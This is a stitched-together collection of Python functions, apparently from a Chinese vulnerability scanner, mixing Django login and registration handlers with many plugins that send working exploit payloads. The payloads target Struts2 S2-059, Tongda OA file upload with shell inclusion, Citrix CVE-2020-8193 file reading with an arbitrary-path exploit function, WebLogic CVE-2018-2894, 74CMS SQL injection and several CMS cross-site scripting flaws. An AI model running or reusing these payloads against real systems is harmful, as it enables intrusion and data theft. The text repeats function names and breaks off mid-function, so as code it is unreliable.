def CreateMarkdownProject(request):#用来创建markdown项目,目前只支持单用户,先用于测试
RequestLogRecord(request, request_api="create_markdown_project")
if request.method == "POST":
try:
UserToken = json.loads(request.body)["token"]
MarkdownProjectName = json.loads(request.body)["markdown_project_name"]#传入项目名称
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="create_markdown_project", uid=Uid)
while True: # 用来生成markdown文件名,防止重复
MarkdownName=randoms().result(250)#markdown文件名,随机生成
CheckName=MarkdownRelationship().CheckConflict(markdown_name=MarkdownName)
if not CheckName: # 如果不冲突的话跳出循环
break
while True: # 用来生成邀请码,防止重复
MarkdownProjectInvitationCode=randoms().result(50)#邀请码
CheckInvitationCode=MarkdownRelationship().CheckInvitationCode(MarkdownProjectInvitationCode=MarkdownProjectInvitationCode)
if not CheckInvitationCode: # 如果不冲突的话跳出循环
break
MarkdownRelationship().Write(markdown_name=MarkdownName,uid=Uid,markdown_project_name=MarkdownProjectName,markdown_project_owner="1",markdown_project_invitation_code=MarkdownProjectInvitationCode)
return JsonResponse({'message': "创建成功啦~玛卡玛卡~", 'code': 200, })
else:
return JsonResponse({'message': "小宝贝这是非法操作哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_CollaborationPlatform_Markdown_CreateMarkdownProject(def)", e)
return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def GenerateVerificationCode(request): #生成验证码函数
RequestLogRecord(request, request_api="get_verification_code")
if request.method == "GET":
try:
RandomVerificationCode = randoms().LowercaseAndNumbers(
6) #获取小写的字符串
RandomVerificationCodeKey = randoms().result(250) #生成验证码相关联的key
PictureBitstream = ImageCaptcha().generate(
RandomVerificationCode).read() #获取图片比特流
VerificationCode().Write(
code=RandomVerificationCode,
verification_code_key=RandomVerificationCodeKey) #把值写入到数据库中
Result = HttpResponse(PictureBitstream) #把图片比特流复制给返回包
Result[
'VerificationCodeKey'] = RandomVerificationCodeKey #把值传到返回包的头中
Result[
'Access-Control-Expose-Headers'] = "VerificationCodeKey" #添加头内容保证前端能够获取到值
return Result
except Exception as e:
ErrorLog().Write(
"Web_BasicFunctions_VerificationCode_GenerateVerificationCode(def)",
e)
return JsonResponse({
'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
'code': 169,
})
else:
return JsonResponse({
'message': '请使用GET请求',
'code': 500,
})
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
RM = randoms().result(10)
RN = randoms().Numbers(5)
try:
payload_url = UniformResourceLocatorParameterSubstitution().Result(
url=url,
vals="%25%7b+%27" + RM + "%27+%2b+(" + RN + "+%2b+" + RN +
").toString()%7d")[0]
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if resp.status_code == 200 and con.find(RM + str(int(RN) * 2)) != -1:
Medusa = "存在Struts2远程代码执行漏洞(S2-059)\r\n漏洞详情:\r\n版本号:S2-059\r\n使用EXP:{}\r\n返回数据:{}\r\n".format(
payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def create_session(session, url, proxies, RandomAgent):
params = {
'type': 'allprofiles',
'sid': 'loginchallengeresponse1requestbody',
'username': '******',
'set': '1'
}
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/xml",
"X-NITRO-USER": randoms().result(8),
"X-NITRO-PASS": randoms().result(8),
}
data = '<appfwprofile><login></login></appfwprofile>'
session.post(url=url + "/pcidss/report",
params=params,
headers=headers,
timeout=6,
data=data,
verify=False,
proxies=proxies)
return session
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
upload_url = url + '/ispirit/im/upload.php'
rm = randoms().result(50)
rm_file = randoms().result(10)
Headers1 = Headers
Headers1[
"Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
Headers1["X-Forwarded-For"] = "127.0.0.1"
Headers1["Connection"] = "close"
Headers1["Upgrade-Insecure-Requests"] = "1"
Headers1[
"Content-Type"] = "multipart/form-data; boundary=---------------------------27723940316706158781839860668"
file_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\necho \"%s\"\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" % (
rm_file, rm)
upload_resp = requests.post(upload_url,
headers=Headers1,
proxies=proxies,
data=file_data)
name = "".join(re.findall("2003_(.+?)\|", upload_resp.text))
get_shell_url = url + '/ispirit/interface/gateway.php'
Headers2 = Headers
Headers2[
"Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
Headers2["X-Forwarded-For"] = "127.0.0.1"
Headers2["Connection"] = "close"
Headers2["Upgrade-Insecure-Requests"] = "1"
Headers2["Content-Type"] = "application/x-www-form-urlencoded"
data = {
"json":
"{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" %
(name, rm_file)
}
get_shell_resp = requests.post(get_shell_url,
headers=Headers2,
proxies=proxies,
data=data)
con = get_shell_resp.text
code = get_shell_resp.status_code
if code == 200 and con.find(rm) != -1:
Medusa = "{}存在通达OA任意文件上传&远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n上传文件内容:{}\r\n返回随机数:{}\r\n如需执行命令请在脚本中修改函数".format(
url, get_shell_url, data, file_data, con)
#如果需要使用命令执行把下面这行注释打开即可
#command(scheme + "://" + url + ":" + str(port))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, get_shell_resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def Registered(request):
RequestLogRecord(request, request_api="registered")
if request.method == "POST":
try:
ShowName = json.loads(request.body).get("show_name")
Username=json.loads(request.body).get("username")
Passwd=json.loads(request.body).get("passwd")
Email=json.loads(request.body).get("email")
Key = json.loads(request.body).get("key")
VerificationCodeKey = json.loads(request.body)["verification_code_key"]#获取验证码关联的KEY
Code = json.loads(request.body)["verification_code"].lower()#获取验证码
if VerificationCodeKey!=None and Code!=None:#判断传入数据不为空
VerificationCodeResult=VerificationCode().Query(code=Code,verification_code_key=VerificationCodeKey)#获取判断
if VerificationCodeResult:#如果为真,进行登录验证
if registration_function_status:#判断是否开启注册功能
if len(ShowName.strip("\r\n"))==0 or len(Username.strip("\r\n"))==0 or len(Passwd.strip("\r\n"))==0 or len(Email.strip("\r\n"))==0 or len(Key.strip("\r\n"))==0:#验证数据不为空
return JsonResponse({'message': '宝贝数据呢?💚', 'code': 666, })
else:
if Key==secret_key_required_for_account_registration:#判断是否符合注册值
VerifyUsername=UserInfo().VerifyUsername(Username)
VerifyEmail=UserInfo().VerifyEmail(Email)
if VerifyUsername or VerifyEmail:
return JsonResponse({'message': '用户名或邮箱已存在', 'code': 604, })
elif (VerifyUsername is None)or(VerifyEmail is None):
return JsonResponse({'message': '报错了🙄', 'code': 404, })
elif not VerifyUsername or not VerifyEmail:
Token=randoms().result(250)
Uid = randoms().result(100)#生成随机数,用户UID
Key = randoms().result(40) #生成key值
DomainNameSystemLogKey = randoms().LowercaseAndNumbers(5) # 生成DNSLOGkey值
Md5Passwd=Md5Encryption().Md5Result(Passwd)#进行加密
UserWrite=UserInfo().Write(name=Username, show_name=ShowName, token=Token, passwd=Md5Passwd,
email=Email, uid=Uid,key=Key,avatar="admin.jpg")
DomainNameSystemLogKeyword().Write(uid=Uid,key=DomainNameSystemLogKey)
if UserWrite:
return JsonResponse({'message': '注册成功', 'code': 200, })
elif UserWrite is None:
return JsonResponse({'message': '未知错误', 'code': 400, })
else:
return JsonResponse({'message': '注册失败', 'code': 603, })
else:
return JsonResponse({'message': '小宝贝这是非法注册哦(๑•̀ㅂ•́)و✧', 'code': 403, })
else:
return JsonResponse({'message': '小宝贝你没有开启注册功能哦!!', 'code': 503, })
else:
return JsonResponse({'message': "验证码错误或者过期!", 'code': 504, })
else:
return JsonResponse({'message': "验证码或者验证码秘钥不能为空!", 'code': 505, })
except Exception as e:
ErrorLog().Write("Web_BasicFunctions_Registered_Registered(def)", e)
return JsonResponse({'message': '自己去看报错日志!', 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ":" + str(port)
session = requests.Session()
create_session(session, payload_url, proxies, RandomAgent)
value = get_rand(session, payload_url, proxies, RandomAgent)
create_session(session, payload_url, proxies, RandomAgent) #再次创建连接
payload = '%2fetc%2fpasswd'
read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
'Content-Type': 'application/xml',
'X-NITRO-USER': randoms().result(8),
'X-NITRO-PASS': randoms().result(8),
'rand_key': value
}
data = '<clipermission></clipermission>'
resp = session.post(url=read_file_payload,
headers=headers,
timeout=6,
data=data,
verify=False,
proxies=proxies)
response_str = json.dumps(resp.headers.__dict__['_store'])
code = resp.status_code
con = resp.text
if code == 406 and "Content-Disposition" in response_str and con.find(
"root:") != -1:
Medusa = "{} 存在Citrix认证绕过漏洞(CVE-2020-8193)\r\n验证数据:\r\n漏洞位置:{}\r\n读取文件:{}\r\n返回数据包:{}\r\n".format(
url, payload_url, payload, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload = '/ws_utc/resources/setting/keystore?timestamp=139114985403'
payload_url =url + payload
RM1=randoms().result(10)
RM2 = randoms().result(100)
data='''------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_name"
1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password_front"
1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password"
1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password_changed"
true
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_filename"; filename="{}.jsp"
Content-Type: application/octet-stream
{}
------WebKitFormBoundaryzVtngnKbQt01czaO--
'''.format(RM1,RM2)
Headers["Content-Type"]="multipart/form-data; boundary=----WebKitFormBoundaryzVtngnKbQt01czaO"
resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False)
con = resp.text
code=resp.status_code
if code==200 and con.find(RM1+".jsp")!=-1 and con.find(RM2)!=-1:
Medusa = "{}存在Weblogic任意文件上传漏洞(CVE-2018-2894)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n上传文件名:{}\r\n上传文件内容:{}\r\n".format(url, payload_url, con,RM1+".jsp",RM2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command").replace("/", "%2f")
try:
payload_url = scheme + "://" + url + ":" + str(port)
session = requests.Session()
create_session(session, payload_url, proxies, RandomAgent)
value = get_rand(session, payload_url, proxies, RandomAgent)
create_session(session, payload_url, proxies, RandomAgent) # 再次创建连接
payload = command
read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
'Content-Type': 'application/xml',
'X-NITRO-USER': randoms().result(8),
'X-NITRO-PASS': randoms().result(8),
'rand_key': value
}
data = '<clipermission></clipermission>'
resp = session.post(url=read_file_payload,
headers=headers,
timeout=6,
data=data,
verify=False,
proxies=proxies)
con = resp.text
ExploitOutput().Banner(OutputData=con) #回显调用函数
_t = VulnerabilityInfo(con)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(20)
payload = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/{}/%29%3C/script%3E".format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
resp = requests.get(payload_url,headers=Headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(">alert(/{}/)".format(rm)) != -1 :
Medusa = "{}存在EcoCMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def Registered(request):
if request.method == "POST":
try:
ShowName = json.loads(request.body).get("show_name")
Username = json.loads(request.body).get("username")
Passwd = json.loads(request.body).get("passwd")
Email = json.loads(request.body).get("email")
if len(ShowName.strip(" \r\n")) == 0 or len(
Username.strip(" \r\n")) == 0 or len(
Passwd.strip(" \r\n")) == 0 or len(
Email.strip(" \r\n")) == 0: #验证数据不为空
return JsonResponse({
'message': '宝贝数据呢?',
'code': 666,
})
else:
VerifyUsername = UserInfo().VerifyUsername(Username)
VerifyEmail = UserInfo().VerifyEmail(Email)
if VerifyUsername or VerifyEmail:
return JsonResponse({
'message': '用户名或邮箱已存在',
'code': 604,
})
elif (VerifyUsername is None) or (VerifyEmail is None):
return JsonResponse({
'message': '报错了',
'code': 404,
})
elif not VerifyUsername or not VerifyEmail:
Token = randoms().result(250)
UserWrite = UserInfo().Write(name=Username,
show_name=ShowName,
token=Token,
passwd=Passwd,
email=Email,
img_path="img_path")
if UserWrite:
return JsonResponse({
'message': '注册成功',
'code': 200,
})
elif UserWrite is None:
return JsonResponse({
'message': '未知错误',
'code': 400,
})
else:
return JsonResponse({
'message': '注册失败',
'code': 603,
})
except Exception as e:
ErrorLog().Write("Web_Api_Registered_Registered(def)", e)
else:
return JsonResponse({
'message': '请使用Get请求',
'code': 500,
})
def medusa(Url,RandomAgent,UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(20)
payload = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/{}/%29%3C/script%3E".format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url,headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(">alert(/{}/)".format(rm)) != -1 :
Medusa = "{}存在EcoCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(20)
payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,headers=headers, data=data, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find("<td><img src=x onerror=alert({})></td>".format(rm)) != -1 :
Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
rm = randoms().result(20)
payload = '/mobile/user.php?act=act_register'
payload_url = url + payload
data = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format(
rm)
resp = requests.post(payload_url,
data=data,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
"<script>alert({})</script>".format(rm)) != -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def Login(request):#用户登录,每次登录成功都会刷新一次Token
RequestLogRecord(request, request_api="login")
if request.method == "POST":
try:
Username=json.loads(request.body)["username"]
Passwd=json.loads(request.body)["passwd"]
Md5Passwd=Md5Encryption().Md5Result(Passwd)#对密码加密
UserLogin=UserInfo().UserLogin(Username,Md5Passwd)
if UserLogin is None:
return JsonResponse({'message': '账号或密码错误', 'code': 604, })
else:
while True:#如果查询确实冲突了
Token = randoms().result(250)
QueryTokenValidity = UserInfo().QueryTokenValidity(Token)#用来查询Token是否冲突了
if not QueryTokenValidity:#如果不冲突的话跳出循环
break
UpdateToken=UserInfo().UpdateToken(name=Username, token=Token)#接着更新Token
if UpdateToken:#如果更新成功了
Uid = UserInfo().QueryUidWithToken(Token) # 查询UID
UserOperationLogRecord(request, request_api="login", uid=Uid)
return JsonResponse({'message': Token, 'code': 200, })
except Exception as e:
ErrorLog().Write("Web_Api_User_LogIn(def)", e)
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=randoms().result(20)
payload = "/plus/ajax_street.php?act=key&key={}%%27%20and%20c_name%20like%20%27%%E5%BB%BA%E8%AE%BE".format(RD)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("{}".format(RD)) != -1 :
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
rm = randoms().result(10)
payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(
rm)
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('<script>alert("' + rm +
'")</script>') != -1:
Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,headers=headers,timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if con.find("<script>alert({})</script>".format(rm))!= -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(20)
payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
if con.find("<script>confirm({})</script>".format(rm)) != -1:
Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(10)
payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.get(payload_url ,headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('<script>alert("'+rm+'")</script>') != -1 :
Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(10)
payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url ,headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('<script>alert("'+rm+'")</script>') != -1 :
